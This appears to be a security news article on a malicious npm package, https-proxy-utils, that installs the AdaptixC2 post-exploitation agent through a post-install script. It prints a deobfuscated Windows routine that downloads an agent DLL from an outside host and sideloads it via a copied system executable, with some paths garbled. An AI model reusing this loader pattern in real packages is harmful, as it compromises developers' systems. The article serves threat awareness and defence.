The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets, one that has now reached the open-source supply chain.
Positioned as a capable alternative to established tools such as Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.
In October, researchers uncovered its delivery through the npm package registry, a supply chain attack targeting developers and organizations that rely on Node.js modules for critical infrastructure and application development.
The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.
The threat actors cloned proxy-related features from popular modules so that the malicious package appeared both useful and harmless.
Upon installation, however, the package ran a post-install script that downloaded and deployed the AdaptixC2 agent onto the victim's system, giving the attackers a stealthy foothold for remote access and further exploitation.
Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.
As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.
Infection Mechanism: OS-Specific Adaptation
A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package's install script runs, it detects the host OS and deploys the payload with a method specific to Windows, macOS, or Linux.
On Windows, the script downloads the agent as a DLL, copies a legitimate executable next to it, and spawns that executable from JavaScript so that it loads the malicious DLL (DLL sideloading).
[Figure: comparison of the packages, legitimate on the right (Source: Securelist)]
Below is the deobfuscated routine used for Windows deployment:
const fs = require('fs');
const { spawn } = require('child_process');
// downloadFile(url, destPath) is defined elsewhere in the deobfuscated installer.

async function onWindows() {
  // The URL and file paths appear truncated in the published excerpt; they are kept as printed.
  const url = "https://cloudcenter.topsysupdate";
  const dllPath = "C:\.dll";          // where the agent DLL is written
  const systemMsdtc = "C:\32.exe";    // legitimate Windows executable from the system directory
  const tasksMsdtc = "C:\.exe";       // copy of that executable staged beside the dropped DLL
  try {
    await downloadFile(url, dllPath);                   // fetch the AdaptixC2 agent DLL
    fs.copyFileSync(systemMsdtc, tasksMsdtc);           // stage the legitimate EXE next to it
    const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });  // run it so it sideloads the DLL
    child.unref();                                      // let the installer exit while the agent keeps running
  } catch (err) {
    console.error(err);
  }
}
The same approach extends to macOS and Linux, where the script uses autorun configuration and architecture-specific binaries to maintain persistent control.
Such OS-targeted infection routines make the framework harder to catch with conventional detection and widen the range of environments it can exploit.